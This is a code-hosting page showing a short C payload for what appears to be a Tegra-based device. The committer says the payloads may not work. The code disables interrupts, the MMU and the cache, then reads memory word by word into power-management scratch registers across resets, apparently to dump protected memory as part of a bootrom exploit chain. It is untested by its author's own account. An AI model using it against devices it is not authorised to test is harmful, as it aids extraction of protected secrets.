Kevin
a83ea3324f
these payloads may not work , i have no clue honestly i attached them , also there are 2 helper py scripts that might work with some of these payloads
36 lines
1.0 KiB
C
36 lines
1.0 KiB
C
#define PMC_BASE 0x7000e400
|
|
#define PMC_SCRATCH0 (PMC_BASE + 0x50)
|
|
#define PMC_SCRATCH1 (PMC_BASE + 0x54)
|
|
#define PMC_CNTRL (PMC_BASE + 0x0)
|
|
|
|
void _start() {
|
|
__asm__ volatile("mrs r0, cpsr\n"
|
|
"orr r0, r0, #0xc0\n" // Disable IRQ/FIQ
|
|
"bic r0, r0, #0x1f\n" // Clear mode bits
|
|
"orr r0, r0, #0x13\n" // Set Supervisor (SVC) mode
|
|
"msr cpsr, r0\n"
|
|
|
|
"mrc p15, 0, r0, c1, c0, 0\n"
|
|
"bic r0, r0, #0x0001\n" // MMU Off
|
|
"bic r0, r0, #0x0004\n" // D-Cache Off
|
|
"mcr p15, 0, r0, c1, c0, 0\n");
|
|
|
|
unsigned int *target =
|
|
(unsigned int *)(*(volatile unsigned int *)PMC_SCRATCH1);
|
|
|
|
if ((unsigned int)target < 0x40000000 || (unsigned int)target > 0xFFF10000) {
|
|
target = (unsigned int *)0x40000000;
|
|
}
|
|
|
|
unsigned int val = *target;
|
|
|
|
*(volatile unsigned int *)PMC_SCRATCH0 = val;
|
|
|
|
*(volatile unsigned int *)PMC_SCRATCH1 = (unsigned int)target + 4;
|
|
|
|
*(volatile unsigned int *)PMC_CNTRL |= (1 << 4);
|
|
|
|
while (1)
|
|
;
|
|
}
|